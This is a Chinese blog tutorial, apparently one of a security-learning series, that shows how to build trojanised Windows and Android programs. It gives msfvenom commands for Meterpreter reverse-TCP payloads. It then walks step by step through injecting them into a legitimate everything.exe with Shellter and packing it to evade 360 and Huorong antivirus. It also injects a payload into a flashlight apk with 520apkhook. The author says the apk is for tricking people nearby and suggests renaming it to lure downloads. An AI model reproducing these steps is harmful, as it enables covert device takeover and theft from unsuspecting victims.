码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • MSF(3)——apk和exe的加马


    本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记

    文章目录

      • 前文链接
      • 工具地址
        • shielden
        • 520apkhook
      • exe 加马
        • shellter附加
          • 安装
          • 软件准备
          • 添加后门
          • 杀软测试
        • 加壳
          • 使用
          • 杀软测试
        • 连接测试
      • apk加马
        • 520apkhook加马
          • 使用
          • 测试连接
        • 杀软测试

    前文链接

    1. WAMP/DVWA/sqli-labs 搭建
    2. burpsuite工具抓包及Intruder暴力破解的使用
    3. 目录扫描,请求重发,漏洞扫描等工具的使用
    4. 网站信息收集及nmap的下载使用
    5. SQL注入(1)——了解成因和手工注入方法
    6. SQL注入(2)——各种注入
    7. SQL注入(3)——SQLMAP
    8. SQL注入(4)——实战SQL注入拿webshell
    9. Vulnhub靶机渗透之Me and My Girlfriend
    10. XSS漏洞
    11. 文件上传漏洞
    12. 文件上传绕过
    13. 文件包含漏洞
    14. Vulnhub靶机渗透之zico2
    15. 命令执行漏洞
    16. 逻辑漏洞(越权访问和支付漏洞)
    17. 网站后台安全
    18. weevely的使用及免杀(Linux中的菜刀)
    19. MSF(1)——一次完整的渗透流程
    20. WebShell命令执行限制(解决方案)
    21. 记一次艰难的SQL注入(过安全狗)
    22. MSF(2)——各种木马的生成及简单的免杀

    工具地址

    shielden

    http://www.safengine.com/download/release.zip

    520apkhook

    https://github.com/cleverbao/520apkhook

    exe 加马

    我先前写的文章里免杀exe马的方式生成四个文件,上传的时候非常麻烦,而且python的meterpreter功能很少,一般在实际情况中需要上传exe马进行进一步控制,但是传一个exe马上去,不仅会被瞬间秒杀,还会被杀软断开连接,于是就有了以下的内容。

    大致流程是先给一个正常的exe文件加后门,然后给他加壳。这样过杀软基本问题就不太大了。

    先用kali生成一个exe的马,192.168.220.129是我kali的地址

    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.220.129 lport=4444 -f exe -o shell.exe
    
    • 1

    使用杀毒软件扫描该文件
    火绒
    在这里插入图片描述
    360
    在这里插入图片描述

    shellter附加

    大概意思是把木马里的代码插入到正常的可执行文件中,这样增加木马的混淆性,使其达到免杀的效果。

    安装

    在这里用shellter工具。

    新版的kali没有shellter了,所以要自己安装。

    以下代码建议先sudo后用root执行。

    apt-get update
    apt-get install shellter
    dpkg --add-architecture i386 && apt-get update && apt-get install wine32
    
    • 1
    • 2
    • 3

    安装好后直接在控制台输入shellter,显示如下即为安装完成
    在这里插入图片描述

    软件准备

    先要准备一个32位的PE文件,尽量小一些,方便上传。

    必须是32位

    在这里我选用32位everything.exe,可点该链接下载

    下载好以后是一个压缩包,解压之后把里面的everything.exe放到kali中
    在这里插入图片描述
    在这里插入图片描述

    添加后门

    启动shellter后,在选择模式后选择A,自动模式

    这里要你输入PE文件的路径,直接输everything的绝对路径就好了
    在这里插入图片描述
    等待数分钟后,要选择是否启用隐身模式这里选择N
    在这里插入图片描述
    接下来按下图填就好了
    在这里插入图片描述
    在这里输入攻击机ip和监听端口,然后稍等一下生成木马
    在这里插入图片描述
    在这里插入图片描述
    这个时候木马就已经生成成功了,生成的木马替换了原本PE文件的位置,原本的PE文件存在Shellter_Backups中
    在这里插入图片描述

    杀软测试

    分别测试火绒和360
    360
    在这里插入图片描述
    火绒
    在这里插入图片描述
    此时已经可以过360了

    加壳

    加壳用到的工具是Shielden

    下载下来的Shielden是一个叫release的文件夹,直接运行里面的Shielden.exe即可,运行图如下
    在这里插入图片描述

    使用

    这个工具非常简单,无脑操作即可

    点击浏览,导入插入木马的Everything.exe
    在这里插入图片描述
    把检测选项的箭头全部打上
    在这里插入图片描述
    把保护选项的箭头全打上
    在这里插入图片描述
    把CheatDefender的箭头全打上
    在这里插入图片描述
    点击保护生成加壳后的文件

    生成后的文件会在源文件名字后加上_se

    生成的文件名为Everything_se.exe
    在这里插入图片描述

    杀软测试

    360
    在这里插入图片描述
    火绒
    在这里插入图片描述
    此时已经可以绕过360和火绒了

    连接测试

    接下来测试一下能否正常使用

    kali中msf设置如下

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 192.168.220.129
    set lport 4444
    run
    
    • 1
    • 2
    • 3
    • 4
    • 5

    可以看到,成功收到了回显
    在这里插入图片描述

    apk加马

    本来我是不想做这个的,但是拿着这个马对周围的人坑蒙拐骗使人实在心情愉悦。于是就有了以下的部分。

    大致流程就是先准备一个正常的apk文件,然后给他附加shellcode,当受害者运行该文件,就会执行shellcode,从而被控制。

    由于以下的全部操作都是真实环境,所以在这里我使用了内网穿透和端口转发技术,具体的操作我心情好可能会写,再这里我的ip和端口都打码或用其他数据代替。能明白原理就行了。

    先生成一个apk的马

    msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.220.129 lport=6666 R>1.apk
    
    • 1

    使用杀毒软件扫描该文件
    火绒
    在这里插入图片描述
    手机管家
    在这里插入图片描述

    520apkhook加马

    520apkhook是一款基于python3和Java的代码注入工具。用作者的话说是

    将msf生成的payload,注入到一个正常的apk文件中,重新打包后进行加固,bypass手机安全管家的检测。

    使用该工具加马,要自己先准备一个apk文件,可以到网上去下那种小工具的apk文件,文件相对比较小,也比较容易诱骗。

    在这里我准备了一个手电筒的apk
    在这里插入图片描述

    使用

    把apk文件改个名字,放到kali中,方便后期加马

    例如我在这里将其改名为flash.apk,并且放到 /home/kali/520apkhook/ 目录下
    在这里插入图片描述
    接下来直接执行如下代码

    python main.py --lhost 192.168.220.129 --lport 6666 -n /home/kali/520apkhook/flash.apk
    
    • 1

    其中lhost填你自己的ip,lport填你自己监听的端口

    如下图即为生成成功
    在这里插入图片描述

    此时在WorkDir目录下生成如下文件

    在这里插入图片描述
    这个AllFinish.apk就是加马的apk文件

    将其改名为手电筒,方便进行下一步诱骗下载

    在这里我就不改名了,并且直接转移到android上

    这个handler.rc是msf的执行文件,如果是内网穿透需要手动修改内容

    在这里插入图片描述
    接下来终端运行msfconsole -r handler.rc打开msf控制台并自动监听
    在这里插入图片描述

    测试连接

    在android手机上运行该apk文件

    只是提示签名不一致,继续安装,并运行该文件。
    在这里插入图片描述
    在这里插入图片描述
    也是成功收到连接,得到meterpreter.

    在这里插入图片描述
    获取系统信息

    杀软测试

    测试火绒
    在这里插入图片描述
    火绒不报毒

  • 相关阅读:
    华为机试 - 最小调整顺序次数
    RocketMq存储设计——MappedFile
    洛谷P7529 Permutation G
    C# 图解教程 第5版 —— 第3章 C# 编程概述
    sql-面试题
    CopyOnWriteArrayList源码分析
    ES6如何声明一个类?类如何继承?
    Android Bitmap 缩放
    Android + Bmob 实现用户注册登录
    C++核心编程
  • 原文地址:https://blog.csdn.net/realmels/article/details/126212963
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号